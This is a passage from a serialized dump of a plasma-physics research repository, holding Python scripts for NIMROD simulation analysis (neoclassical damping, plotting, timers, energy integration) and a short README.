print(f\"q={4} nu_* = {nut(rhoq4)} nu_* approx = {nut_approx(rhoq4)}\")\n\n ### NC ion poloidal flow ###\n\n\n\n tauss = nustauss/nu_s\n\n K00B_s = (z + sqrt2-np.log(1+sqrt2))/nustauss\n\n K01B_s = (z + 1.0/sqrt2)/nustauss # isn't this just 1?\n K11B_s = (2.0*z + 9.0/(4.0*sqrt2))/nustauss\n K00P_s = np.sqrt(np.pi)\n K01P_s = 3 * np.sqrt(np.pi)\n K11P_s = 12 * np.sqrt(np.pi)\n K00PS_s = (17.0*z/4.0 + 205.0/(sqrt2*48.0))/D\n K01PS_s = (7.0/2.0)*(23.0*z/4.0 + 241.0/(sqrt2*48.0))/D\n K11PS_s = (49.0/4.0)*(33.0*z/4.0 + 325.0/(sqrt2*48.0))/D\n\n K00tot_s = K00B_s/(1.0 + np.sqrt(nustar_s) + 2.92*nustar_s*K00B_s/K00P_s) \\\n /(1.0 + 2.0*K00P_s/(3.0*omegat_s*tauss*K00PS_s))\n K01tot_s = K01B_s/(1.0 + np.sqrt(nustar_s) + 2.92*nustar_s*K01B_s/K01P_s) \\\n /(1.0 + 2.0*K01P_s/(3.0*omegat_s*tauss*K01PS_s))\n K11tot_s = K11B_s/(1.0 + np.sqrt(nustar_s) + 2.92*nustar_s*K11B_s/K11P_s) \\\n /(1.0 + 2.0*K11P_s/(3.0*omegat_s*tauss*K11PS_s))\n\n muiratio = 5.0/2.0 - K01tot_s/K00tot_s\n# mu00_s = K00tot_s * nu_s * tauss * f_trap[0,:]/f_pass[0,:] #TODO\n\n mu00_s = K00tot_s * nu_s * f_trap[0,:]/f_pass[0,:] #TODO remove tauss\n mu00_s_norm = K00tot_s* f_trap[0,:]/f_pass[0,:]\n\n\n if species=='ion':\n flabel=r'$\\mu_{i}$'\n else:\n flabel=r'$\\mu_{e}$'\n fig_size = [12,6.75]\n fig,ax = plt.subplots(figsize=fig_size)\n ax.axvline(rhoq2, ls=':')\n ax.axvline(rhoq3, ls=':')\n ax.axvline(rhoq4, ls=':')\n pn.plot_scalar_line(None, mu00_s, flabel=flabel,\n xvar=rhon, xlabel=r'$\\rho_N$', ylabel=r'Damping Frequency [1/s]',\n legend_loc='upper left',ax=ax)\n\n\n mus=interp1d(rhon,mu00_s)\n mus_norm=interp1d(rhon,mu00_s_norm)\n print(f\"q={2} mu_s = {mus(rhoq2)} mu_s/nu approx = {mus_norm(rhoq2)}\")\n print(f\"q={3} mu_s = {mus(rhoq3)} mu_s/nu approx = {mus_norm(rhoq3)}\")\n print(f\"q={4} mu_s = {mus(rhoq4)} mu_s/nu approx = {mus_norm(rhoq4)}\")\n\n# mu01_s = 5.0/2.0*K00tot_s - K01tot_s\n# mu11_s = K11tot_s - 5.0*K01tot_s + 25.0/4.0*K00tot_s\n# nu11_s = sqrt2 # lots of assumptions here\n\n\n\n\n\n\n\n # Setup FSA quants spline as function of rhon\n #zvars = np.zeros((2, )+yvars.shape) # psin,q + yvars\n #zvars[0,:] = dvar[0,:] # psin\n #zvars[1,:] = dvar[7,:] # q\n #zvars[2:,:] = yvars[:,:]\n #splrho = interp1d(rhon, zvars, kind='cubic')\n\n #pn.plot_scalar_line(None, yvars[0,:], flabel=r'p', xvar=dvar[1,:], ylabel=r'pressure (Pa)', xlabel=r'\\rho_N', legend_loc='upper right')\n #pn.plot_scalar_line(None, yvars[1,:], flabel=r'n', xvar=dvar[1,:], ylabel=r'density (m^{-3})', xlabel=r'\\rho_N', legend_loc='upper right')\n\n ##2D plots -- forces\n #xres=250; yres=250 # need y=1000\n #grid = pn.grid_2d_gen([1.14, -1.19, 0], [1.14, 1.02, 0], [2.31, -1.19, 0], xres, yres)\n #\n #maskfilename = 'mask'+str(xres)+'x'+str(yres)+'.npy'\n #if os.path.exists(maskfilename):\n # mask = np.load(maskfilename)\n #else:\n # mask = np.zeros((1,grid.shape[1],grid.shape[2]))\n # for ix in range(grid.shape[1]):\n # for iy in range(grid.shape[2]):\n # if contourContains(Rsep,Zsep,grid[0,ix,iy],grid[1,ix,iy]):\n # mask[0,ix,iy] = 1.0\n # else:\n # mask[0,ix,iy] = np.nan\n # np.save(maskfilename,mask)\n #\n ##fval = eval_nimrod.eval_field('ti', grid, dmode=0, eq=2)\n ##ti = Scalar(fval, grid, torgeom=gmt, dmod=0)\n ##fval = eval_nimrod.eval_field('n', grid, dmode=1, eq=2)\n ##ne = Scalar(fval, grid, torgeom=gmt, dmod=1, nqty=0)\n ##nd = Scalar(fval, grid, torgeom=gmt, dmod=1, nqty=1)\n ##nc = Scalar(fval, grid, torgeom=gmt, dmod=1, nqty=2)\n #fval = eval_nimrod.eval_field('v', grid, dmode=2, eq=2)\n #v = Vector(fval, grid, torgeom=gmt, dmod=2)\n 
#fval = eval_nimrod.eval_field('b', grid, dmode=1, eq=2)\n #B = Vector(fval, grid, torgeom=gmt, dmod=1)\n #\n #divv = 2.0/3.0 * div(v)\n #pn.plot_scalar_plane(grid, mask[0]*divv.data, ax=setBdryPlot())\n #BdcvcB = B.dot( curl( v.cross(B) ) ) / B.dot(B)\n #pn.plot_scalar_plane(grid, mask[0]*BdcvcB.data, ax=setBdryPlot())\n #PiParFast = BdcvcB + divv\n #pn.plot_scalar_plane(grid, mask[0]*PiParFast.data, ax=setBdryPlot(), fmin=-10000., fmax=10000.)\n\n # 1D force-balance test\n grid = pn.grid_1d_gen([1.76821, -0.0188439, 0], [2.7, -0.0188439, 0], 1000)\n fval = eval_nimrod.eval_field('p', grid, dmode=2, eq=1)\n p = Scalar(fval, grid, torgeom=gmt, dmod=2)\n fval = eval_nimrod.eval_field('b', grid, dmode=1, eq=1)\n B = Vector(fval, grid, torgeom=gmt, dmod=1)\n fval = eval_nimrod.eval_field('j', grid, dmode=1, eq=1)\n j = Vector(fval, grid, torgeom=gmt, dmod=1)\n fval = eval_nimrod.eval_field('v', grid, dmode=1, eq=1)\n v = Vector(fval, grid, torgeom=gmt, dmod=1)\n fval = eval_nimrod.eval_field('n', grid, dmode=1, eq=1)\n nd = Scalar(fval, grid, torgeom=gmt, dmod=1, nqty=1)\n fval = eval_nimrod.eval_field('ti', grid, dmode=1, eq=1)\n ti = Scalar(fval, grid, torgeom=gmt, dmod=1)\n #nc = Scalar(fval, grid, torgeom=gmt, dmod=1, nqty=2)\n # computed quantities\n jxb=j.cross(B)\n grp=p.grad()\n mc=1.9944235e-26\n #rhovdgrdv = (md*nd+mc*nc)*v.dot(grad(v))\n rhovdgrdv = (md*nd)*v.dot(grad(v))\n\n force=jxb-grp\n# pn.plot_vector_line(grid, force.data, flabel=r'Force', f2=jxb.data,\n# f2label=r'$J\\times B$',\n# f3=grp.data, f3label=r'$\\nabla p$',\n# f4=rhovdgrdv.data, f4label=r'$v\\cdot \\nabla v$',\n# comp='perp', style='varied',\n# legend_loc='lower left', ylabel=r'Force density N/m^3')\n\n# pn.plot_scalar_line(grid, ti.data, flabel=r'T_i', style='varied',\n# legend_loc='lower left', ylabel=r'Temperature eV')\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description='Perform mu calculations from UW-CPTC-09-6R'\n )\n parser.add_argument('file',help='dumpfile',default='dumpgll.00000.h5')\n args = vars(parser.parse_args())\n neoclassical_calculator(dumpfile=args['file'])\n" }, { "alpha_fraction": 0.6500920653343201, "alphanum_fraction": 0.6519337296485901, "avg_line_length": 19.923076629638672, "blob_id": "11a46590f518776f213f115350a3e9ff83530f90", "content_id": "deb05fd11db8a9e168828ce43f206608036c08f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 543, "license_type": "no_license", "max_line_length": 74, "num_lines": 26, "path": "/surfmnNim/README.md", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "# surfmnNim\nA collection of scripts for generating surface mn plots from NIMROD output\nThese scripts were developed by Matt Beidler. 
\n\n## Inputs\n - fgProfs binary\n - xy_slice binary\n \n## Outputs\n - Numerous profile slices\n - Pretty Surface MN plots\n - Possibly more (not sure)\n \n## Key Steps\n - Not sure \n \n## Status of the code\n - Code runs\n \n## Todo\n - [ ] Run the code and figure out how it works\n - [ ] Update to be python 3 compliant\n - [ ] camelCase the code\n - [ ] Use the code to make pretty pictures\n - [ ] ...\n - [ ] Profit" }, { "alpha_fraction": 0.6325757503509521, "alphanum_fraction": 0.6780303120613098, "avg_line_length": 19.30769157409668, "blob_id": "0d4acfe87be6d8bcf725b4c3e2c82b5e612c8639", "content_id": "49d37ce919ad60b3860f13b265dcdd05c64204bd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 792, "license_type": "no_license", "max_line_length": 61, "num_lines": 39, "path": "/random/bump_pulse.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\n#\n# Input files:\n# Ouput file:\n\n\nimport numpy as np\nimport sys\nimport matplotlib.pyplot as plt\n\n\ndef bump_function(amp,time,time_scale,time_offset):\n t_norm = (time-time_offset)/time_scale\n t_norm_sq = t_norm * t_norm\n if t_norm_sq >= 1.0:\n return 0.0\n else:\n return amp*np.exp(- 1.0/(1.0-t_norm_sq))\n\n\namp = 1.0\nt_scale = 0.50\nt_offset = 0.505\nnpts = 1000\n\ntime = np.linspace(0,10*t_offset,npts)\nbump = np.zeros([npts])\nfor it, tt in enumerate(time):\n bump[it] = bump_function(amp,tt,t_scale,t_offset)\n\nfig =plt.figure(figsize=(8,6))\nax = fig.add_subplot(111)\nax.set_title(\"Magnetic Perturbation Pulse Shape\",fontsize=18)\nax.plot(time,bump)\nax.set_xlabel(\"Time [ms]\",fontsize=18)\nax.set_ylabel(\"Amplitude [A.U.]\",fontsize=18)\nplt.tight_layout()\nplt.show()\n" }, { "alpha_fraction": 0.5308270454406738, "alphanum_fraction": 0.5323308110237122, "avg_line_length": 24.909090042114258, "blob_id": "652c114ba219930c05e8b656ece769e72a5576ce", "content_id": "1231ea2f58162278fcb642796583696e50b01b64", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1995, "license_type": "no_license", "max_line_length": 59, "num_lines": 77, "path": "/mre_analysis/nim_timer.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport time\nimport functools\n\nclass timeObject:\n def __init__(self,name):\n self.__start=None\n self.__elapsed=0.0\n self.__name=name\n \n def start(self):\n if self.__start is not None:\n print(f\"{self.__name} timer was not reset\")\n raise ValueError\n self.__start=time.time()\n return None\n \n def stop(self):\n end=time.time()\n if self.__start is None:\n print(f\"{self.__name} timer was never started\")\n raise ValueError\n self.__elapsed+=(end-self.__start)\n self.__start=None\n return None\n \n def get_elpased(self):\n return self.__elapsed\n \n def print_time(self):\n print(f\"{self.__name}: {self.__elapsed}s\")\n return None\n \nclass nimTimer:\n ''' A timer class for profiling python scripts '''\n def __init__(self):\n self.__ids={}\n \n def start(self,id):\n if id in self.__ids:\n self.__ids[id].start()\n else:\n self.__ids[id]=timeObject(id)\n self.__ids[id].start()\n return None\n \n def stop(self,id):\n if id not in self.__ids:\n print(f\"{id} not found in nimTime\")\n raise Keyerror\n self.__ids[id].stop()\n return None\n\n def get_elapsed(self,id):\n if id not in self.__ids:\n print(f\"{id} not found in nimTime\")\n raise Keyerror\n return self.__ids[id].get_elapsed()\n \n def 
print_times(self):\n for val in self.__ids.values():\n val.print_time()\n return None\n\ntimer=nimTimer()\n\ndef timer_func(func):\n '''function wrapper to use nimTimer as a decorator\n use: @nim_timer.timer_func before function def\n '''\n @functools.wraps(func)\n def wrapper(*args,**kwargs):\n timer.start(func.__name__)\n result=func(*args,**kwargs)\n timer.stop(func.__name__)\n return result\n return wrapper\n" }, { "alpha_fraction": 0.560079038143158, "alphanum_fraction": 0.6304348111152649, "avg_line_length": 29.636363983154297, "blob_id": "874e88ddc0dfefab380fb4c809872f34ee2ca554", "content_id": "3d3408fa33c8e2d8ce8e8016e621b1941ce41334", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5060, "license_type": "no_license", "max_line_length": 68, "num_lines": 165, "path": "/plotingScripts/freeBdryPlts.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\nhomeDir = os.environ['HOME']\n\nfname=homeDir + \"/SCRATCH/d4d/poster/fbdry.txt\"\ndata = np.loadtxt(fname)\n\ntitle = \"Shape Error (Controller not reset)\"\nymin=1.0e-4\nymax=1\n\nncoils = int(max(data[:,1]))\nits = data.shape[0]/ncoils\nprint its\n\n\nstep = np.zeros(its)\nic0 = np.zeros([its,ncoils])\nic = np.zeros([its,ncoils])\nchisq = np.zeros(its)\n\nfor ii in range(0, data.shape[0], ncoils):\n it = int(ii/ncoils)\n step[it] = data[ii,0]\n chisq[it] = data[ii,6]\n for jj in range(ncoils):\n ic0[it,jj] = data[ii+jj,2]/1e6\n ic[it,jj] = data[ii+jj,5]/1e6\n \nict=ic0+ic\n\n\n\nmaxplt = step.size \nfig, ax1 = plt.subplots()\nax1.plot(step[0:maxplt], chisq[0:maxplt]/100, 'b-')\n#ax1.vlines(25,ymin,ymax,linestyle='dotted')\n#ax1.vlines(50,ymin,ymax,linestyle='dotted')\n#ax1.vlines(75,ymin,ymax,linestyle='dotted')\nax1.set_xlabel(r'GS Iteration',fontsize=16)\n#ax1.axes.set_xlim(left=0,right=1)\n\n# Make the y-axis label, ticks and tick labels match the line color.\nax1.set_ylabel(r'$\\chi^2$ Error',rotation=90,fontsize=16)\nax1.axes.set_ylim(ymin,ymax)\n#ax1.axes.set_ylim(0,1)\nplt.yscale(\"log\")\nax1.tick_params(axis='both', which='major', labelsize=14)\n#plt.locator_params(axis='y', nbins=6)\nfig.tight_layout()\nplt.title(title)\nplt.show() \n\n#inital current\n\nfig, ax1 = plt.subplots()\nax1.plot(step[0:maxplt], ic0[0:maxplt,0], '-')\n#ax1.plot(step, ic0[:,1], '-')\nax1.plot(step[0:maxplt], ic0[0:maxplt,2], '-')\n#ax1.plot(step, ic0[0:maxplt,3], '-')\nax1.plot(step[0:maxplt], ic0[0:maxplt,4], '-')\n#ax1.plot(step, ic0[:,5], '-')\nax1.plot(step[0:maxplt], ic0[0:maxplt,6], '-')\n#ax1.plot(step, ic0[:,7], '-')\nax1.plot(step[0:maxplt], ic0[0:maxplt,8], '-')\n#ax1.plot(step, ic0[:,9], '-')\nax1.plot(step[0:maxplt], ic0[0:maxplt,10], '-')\n#ax1.plot(step, ic0[:,11], '-')\nax1.plot(step[0:maxplt], ic0[0:maxplt,12], '-')\n#ax1.plot(step, ic0[:,13], '-')\nax1.plot(step[0:maxplt], ic0[0:maxplt,14], '-')\n#ax1.plot(step, ic0[:,15], '-')\nax1.plot(step[0:maxplt], ic0[0:maxplt,16], '-')\n#ax1.plot(step, ic0[:,17], '-')\n\nax1.set_xlabel(r'GS Iteration',fontsize=16)\n#ax1.axes.set_xlim(left=0,right=1)\n\n# Make the y-axis label, ticks and tick labels match the line color.\nax1.set_ylabel(r'Inital $I_c$ [MA]',rotation=90,fontsize=16)\n#ax1.axes.set_ylim(0,1)\nax1.tick_params(axis='both', which='major', labelsize=14)\nplt.locator_params(axis='y', nbins=6)\nfig.tight_layout()\n\nplt.show() \n\n#inital current\n\nfig, ax1 = plt.subplots()\nax1.plot(step[0:maxplt], ic[0:maxplt,0], '-')\n#ax1.plot(step, 
ic[:,1], '-')\nax1.plot(step[0:maxplt], ic[0:maxplt,2], '-')\n#ax1.plot(step, ic[:,3], '-')\nax1.plot(step[0:maxplt], ic[0:maxplt,4], '-')\n#ax1.plot(step, ic[:,5], '-')\nax1.plot(step[0:maxplt], ic[0:maxplt,6], '-')\n#ax1.plot(step, ic[:,7], '-')\nax1.plot(step[0:maxplt], ic[0:maxplt,8], '-')\n#ax1.plot(step, ic[:,9], '-')\nax1.plot(step[0:maxplt], ic[0:maxplt,10], '-')\n#ax1.plot(step, ic[:,11], '-')\nax1.plot(step[0:maxplt], ic[0:maxplt,12], '-')\n#ax1.plot(step, ic[:,13], '-')\nax1.plot(step[0:maxplt], ic[0:maxplt,14], '-')\n#ax1.plot(step, ic[:,15], '-')\nax1.plot(step[0:maxplt], ic[0:maxplt,16], '-')\n#ax1.plot(step, ic[:,17], '-')\n\nax1.set_xlabel(r'GS Iteration',fontsize=16)\n#ax1.axes.set_xlim(left=0,right=1)\n\n# Make the y-axis label, ticks and tick labels match the line color.\nax1.set_ylabel(r'$\\delta I_c$ [MA]',rotation=90,fontsize=16)\n#ax1.axes.set_ylim(0,1)\nax1.tick_params(axis='both', which='major', labelsize=14)\nplt.locator_params(axis='y', nbins=6)\nfig.tight_layout()\n\nplt.show() \n\n#totla current\n\nfig, ax1 = plt.subplots()\nax1.plot(step[0:maxplt], ict[0:maxplt,0], '-')\nax1.plot(step[0:maxplt], ict[0:maxplt,2], '-')\n#ax1.plot(step, ic[:,3], '-')\nax1.plot(step[0:maxplt], ict[0:maxplt,4], '-')\n#ax1.plot(step, ic[:,5], '-')\nax1.plot(step[0:maxplt], ict[0:maxplt,6], '-')\n#ax1.plot(step, ic[:,7], '-')\nax1.plot(step[0:maxplt], ict[0:maxplt,8], '-')\n#ax1.plot(step, ic[:,9], '-')\nax1.plot(step[0:maxplt], ict[0:maxplt,10], '-')\n#ax1.plot(step, ic[:,11], '-')\nax1.plot(step[0:maxplt], ict[0:maxplt,12], '-')\n#ax1.plot(step, ic[:,13], '-')\nax1.plot(step[0:maxplt], ict[0:maxplt,14], '-')\n#ax1.plot(step, ic[:,15], '-')\nax1.plot(step[0:maxplt], ict[0:maxplt,16], '-')\n#ax1.plot(step, ic[:,17], '-')\nax1.plot(step[0:maxplt], ict[0:maxplt,1], '-')\nax1.plot(step[0:maxplt], ict[0:maxplt,3], '-')\nax1.plot(step[0:maxplt], ict[0:maxplt,5], '-')\nax1.plot(step[0:maxplt], ict[0:maxplt,7], '-')\nax1.plot(step[0:maxplt], ict[0:maxplt,9], '-')\nax1.plot(step[0:maxplt], ict[0:maxplt,11], '-')\nax1.plot(step[0:maxplt], ict[0:maxplt,13], '-')\nax1.plot(step[0:maxplt], ict[0:maxplt,15], '-')\nax1.plot(step[0:maxplt], ict[0:maxplt,17], '-')\n\n\nax1.set_xlabel(r'GS Iteration',fontsize=16)\n#ax1.axes.set_xlim(left=0,right=1)\n\n# Make the y-axis label, ticks and tick labels match the line color.\nax1.set_ylabel(r'$I_c$ [MA]',rotation=90,fontsize=16)\n#ax1.axes.set_ylim(0,1)\nax1.tick_params(axis='both', which='major', labelsize=14)\nplt.locator_params(axis='y', nbins=6)\nfig.tight_layout()\n\nplt.show() " }, { "alpha_fraction": 0.5990534424781799, "alphanum_fraction": 0.6855983734130859, "avg_line_length": 24.06779670715332, "blob_id": "cded119817ebfbb07faf53dd464db5e7082b794e", "content_id": "c91fcc110aad649ddcafb373f2a762257d7fb977", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1479, "license_type": "no_license", "max_line_length": 69, "num_lines": 59, "path": "/plotingScripts/drawpss.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math as m\nimport os\n\nhomeDir = os.environ['HOME']\nrelDir = \"/SCRATCH/174446_novac_debug/nonlin1_eq26_bamp3_nimfl/4000/\"\nfileName = \"nimfl0004000.dat\"\n\nfullFile = homeDir+relDir+fileName\ndata = np.loadtxt(fullFile)\nsizes=0.005\nsizes2=0.05\n\nsurfaces = []\nn3m1 = [53,63,66,97,98,100,116,139,236,240,264,276,283,287]\nn2m1 = 
[94,109,170,199,252]\nprint(data.shape)\nlast_surface = -1\nn_surface = 0\nfor ii in range(data.shape[0]):\n if data[ii,3]== last_surface:\n n_surface = n_surface+1\n else:\n if n_surface > 0:\n this_surface = np.zeros([n_surface,2])\n this_surface = data[i_start:ii,0:2]\n surfaces.append(this_surface)\n i_start = ii\n n_surface = 1\n last_surface = data[ii,3]\nthis_surface = data[i_start:,0:2]\nsurfaces.append(this_surface)\n\nprint(len(surfaces))\nlastl =0.0\nnskip=20\n\n\nfig=plt.figure(figsize=(4,6))\nax = fig.add_subplot(111)\nfor i_surface in range(0,len(surfaces),nskip):\n this_surface = surfaces[i_surface]\n ax.scatter(this_surface[:,0],this_surface[:,1],s=sizes,c='k')\nfor i_surface in n3m1:\n this_surface = surfaces[i_surface]\n ax.scatter(this_surface[:,0],this_surface[:,1],s=sizes2)\nfor i_surface in n2m1:\n this_surface = surfaces[i_surface]\n ax.scatter(this_surface[:,0],this_surface[:,1],s=sizes2)\n\n \nax.set_xlabel(r\"$R$\", size=16)\nax.set_ylabel(r\"$Z$\",size=16,rotation=0)\nplt.axis('equal')\nax.set_xlim([1,2.5])\nplt.tight_layout()\nplt.show()\n" }, { "alpha_fraction": 0.44662681221961975, "alphanum_fraction": 0.4925277531147003, "avg_line_length": 37.60439682006836, "blob_id": "30effc41bf245d65f3a29227464decc9e83b0ffd", "content_id": "20b21f48b0718c102502411db319dc5b6fbfe7dd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14052, "license_type": "no_license", "max_line_length": 87, "num_lines": 364, "path": "/hocradic/hcStep.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport eval_nimrod as eval\nimport plot_nimrod as pn\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\nimport h5py\nimport numpy as np\nimport pickle\nimport hcFields as hc\nimport nim_timer as timer\n\nclass hcstep:\n def __init__(self,dumpfile,nimrodin):\n self.dumpfile=dumpfile\n self.nimrodin=nimrodin\n self.fields=hc.hcfields(dumpfile,nimrodin)\n self.time=None\n self.step=None\n self.eval=None\n self.energyDict={}\n self.powerDict={}\n self.volume=None\n self.grid=None\n self.intSet=False\n self.intWeight=np.empty([1])\n\n def dump(self,file):\n pickle.dump(self.dumpfile,file)\n pickle.dump(self.nimrodin,file)\n pickle.dump(self.time,file)\n pickle.dump(self.step,file)\n pickle.dump(self.energyDict,file)\n pickle.dump(self.powerDict,file)\n pickle.dump(self.volume,file)\n\n def load(self,file):\n with open(file,'rb') as pickle_file:\n self.dumpfile=pickle.load(pickle_file)\n self.nimrodin=pickle.load(pickle_file)\n self.time=pickle.load(pickle_file)\n self.step=pickle.load(pickle_file)\n self.energyDict=pickle.load(pickle_file)\n self.powerDict=pickle.load(pickle_file)\n self.volume=pickle.load(pickle_file)\n\n def set_3dgrid(self,rmin,rmax,zmin,zmax,nr,nz,lphi,nonlin_order=2,debug=0):\n '''sets up a 3d grid, using non to determine the number of phi planes\n based on\n '''\n self.nmodes=self.calc_nmodes(lphi)\n self.nmax=self.nmodes-1\n nphi=self.calc_nplanes(lphi)\n phimax=np.pi*2*(nphi-1)/nphi\n p1 = np.array([rmin, zmin, 0.0])\n p2 = np.array([rmax, zmin, 0.0])\n p3 = np.array([rmin, zmax, 0.0])\n p4 = np.array([rmin, zmin, phimax])\n rzp3d = pn.PlotNimrod.grid_3d_gen(p1, p2, p3, p4, nr, nz,nphi)\n self.fields.grid=eval.EvalGrid(rzp3d)\n self.fields.grid.set_debug(debug)\n self.fields.grid.set_3d_symm()\n\n @staticmethod\n def calc_nmodes(lphi):\n nmodes=int(2**lphi/3)+1\n return nmodes\n\n @staticmethod\n def calc_nplanes(lphi):\n nplanes = 2**lphi\n return 
nplanes\n\n def get_dumptime(self):\n ''' Open the hdf5 dumpfile read the dump time and dumpstep\n '''\n with h5py.File(self.dumpfile, 'r') as h5file:\n try:\n self.time=h5file[\"dumpTime\"].attrs['vsTime']\n self.step=int(h5file[\"dumpTime\"].attrs['vsStep'])\n except:\n print(f\"Error reading time or step in {self.dumpfile}\")\n raise\n\n def setUpIntegrand(self):\n ''' This function calcualtes the weights for integration\n using normal quadrature'''\n ndim=self.fields.grid.rzp.ndim\n if ndim ==3:\n rz=self.fields.grid.rzp\n xy=self.fields.grid.xy\n elif ndim==4:\n if not self.fields.grid.symm_3d:\n print(\"integration assuming symmetric grid\")\n raise ValueError\n rz=self.fields.grid.rzp[:,:,:,0]\n xy=self.fields.grid.xy[:,:,:,0]\n else:\n #first dim is RZ component\n print(\"integration require ndim=3,4\")\n raise ValueError\n self.intWeight=np.zeros_like(rz[0])\n for jj in range(np.shape(self.intWeight)[1]):\n for ii in range(np.shape(self.intWeight)[0]):\n if not np.isnan(xy[:,ii,jj]).any():\n horz='m'\n vert='m'\n if ii==0: #logic ignore degenerate cases /\\ and \\/\n horz='l'\n elif ii== np.shape(self.intWeight)[0]-1:\n horz='r'\n elif np.isnan(xy[:,ii-1,jj]).any():\n horz='l'\n elif np.isnan(xy[:,ii+1,jj]).any():\n horz='r'\n if jj==0:\n vert='b'\n elif jj== np.shape(self.intWeight)[1]-1:\n vert='t'\n elif np.isnan(xy[:,ii,jj-1]).any():\n vert='b'\n elif np.isnan(xy[:,ii,jj+1]).any():\n vert='t'\n if horz=='l':\n if vert=='b':\n #bottom left\n self.intWeight[ii,jj]=0.25*rz[0,ii,jj]* \\\n (rz[0,ii+1,jj]-rz[0,ii,jj])* \\\n (rz[1,ii,jj+1]-rz[1,ii,jj])\n elif vert=='t':\n #top left\n self.intWeight[ii,jj]=0.25*rz[0,ii,jj]* \\\n (rz[0,ii+1,jj]-rz[0,ii,jj])* \\\n (rz[1,ii,jj]-rz[1,ii,jj-1])\n else:\n #left middle\n self.intWeight[ii,jj]=0.25*rz[0,ii,jj]* \\\n (rz[0,ii+1,jj]-rz[0,ii,jj])* \\\n (rz[1,ii,jj+1]-rz[1,ii,jj-1])\n elif horz=='r':\n if vert=='b':\n #bottom right\n self.intWeight[ii,jj]=0.25*rz[0,ii,jj]* \\\n (rz[0,ii,jj]-rz[0,ii-1,jj])* \\\n (rz[1,ii,jj+1]-rz[1,ii,jj])\n elif vert=='t':\n #top right\n self.intWeight[ii,jj]=0.25*rz[0,ii,jj]* \\\n (rz[0,ii,jj]-rz[0,ii-1,jj])* \\\n (rz[1,ii,jj]-rz[1,ii,jj-1])\n else:\n #middle right\n self.intWeight[ii,jj]=0.25*rz[0,ii,jj]* \\\n (rz[0,ii,jj]-rz[0,ii-1,jj])* \\\n (rz[1,ii,jj+1]-rz[1,ii,jj-1])\n else:\n if vert=='b':\n #bottom middle\n self.intWeight[ii,jj]=0.25*rz[0,ii,jj]* \\\n (rz[0,ii+1,jj]-rz[0,ii-1,jj])* \\\n (rz[1,ii,jj+1]-rz[1,ii,jj])\n elif vert=='t':\n #top middle\n self.intWeight[ii,jj]=0.25*rz[0,ii,jj]* \\\n (rz[0,ii+1,jj]-rz[0,ii-1,jj])* \\\n (rz[1,ii,jj]-rz[1,ii,jj-1])\n else:\n #middle middle\n self.intWeight[ii,jj]=0.25*rz[0,ii,jj]* \\\n (rz[0,ii+1,jj]-rz[0,ii-1,jj])* \\\n (rz[1,ii,jj+1]-rz[1,ii,jj-1])\n return\n\n def integrateSurface(self,integrand,twopi=True):\n #first check to see if integrand is set up.\n if not self.intSet:\n self.setUpIntegrand()\n if twopi:\n phifac=np.pi*2.0\n else:\n phifac=1.0\n if type(integrand) == np.ndarray:\n integral=phifac*np.tensordot(integrand,self.intWeight,axes=([0,1],[0,1]))\n else:\n print(f\"Integrand of type {type(integrand)} is not supported\")\n raise TypeError\n return integral\n\n def integrateEnergy(self,plot_integrand=False):\n self.fields.energyDensity()\n if self.fields.filter is None:\n self.fields.calculateFilter()\n for key, integrand in self.fields.energyDict.items():\n if integrand.ndim == self.fields.filter.ndim:\n filtered_int = integrand * self.fields.filter\n else:\n filtered_int = integrand * self.fields.filter[...,0]\n 
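# Note: integrateSurface below contracts the integrand with the precomputed\n            # quadrature weights from setUpIntegrand (roughly w_ij ~ R_ij*dR*dZ/4) and\n            # multiplies by 2*pi, i.e. integral ~ 2*pi*sum_ij w_ij*f_ij, so each filtered\n            # energy density is converted to a volume-integrated energy.\n            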
integral=self.integrateSurface(filtered_int)\n print(key,integral)\n self.energyDict[key]=integral\n if plot_integrand:\n #todo This needs work\n self.plotIntegrand(filtered_int,imode=1)\n\n def integratePowerFlux(self,plot_integrand=False):\n self.fields.powerFlux()\n if self.fields.filter is None:\n self.fields.calculateFilter()\n for key, integrand in self.fields.powerFluxDict.items():\n filtered_int = integrand * self.fields.filter\n integral=self.integrateSurface(filtered_int)\n print(key,integral)\n if plot_integrand:\n #todo This needs work\n self.plotIntegrand(filtered_int,imode=1)\n self.powerDict[key]=integral\n\n def integratePowerFluxAdv(self,plot_integrand=False):\n self.fields.advectPowerFlux()\n if self.fields.filter is None:\n self.fields.calculateFilter()\n for key, integrand in self.fields.advectDict.items():\n filtered_int = integrand * self.fields.filter\n integral=self.integrateSurface(filtered_int)\n print(key,integral)\n if plot_integrand:\n #todo This needs work\n self.plotIntegrand(filtered_int,imode=1)\n self.powerDict[key]=integral\n\n def plotIntegrand(self,integrand,imode=None,title=\"Power Transfer\"):\n ndim=self.fields.grid.rzp.ndim\n if ndim ==3:\n rz=self.fields.grid.rzp\n xy=self.fields.grid.xy\n elif ndim==4:\n if not self.fields.grid.symm_3d:\n print(\"integration assumes symmetric grid\")\n raise ValueError\n rz=self.fields.grid.rzp[:,:,:,0]\n xy=self.fields.grid.xy[:,:,:,0]\n else:\n #first dim is RZ component\n print(\"integration require ndim=3,4\")\n raise ValueError\n if imode==None:\n pass\n else:\n figsize=[6,6]\n fig, ax = plt.subplots(figsize=figsize)\n ax.set_aspect('equal')\n ax.set(title=title )#r\"$v\\cdot \\nabla p$\")\n plt.contourf(rz[0],rz[1],integrand[...,imode])\n 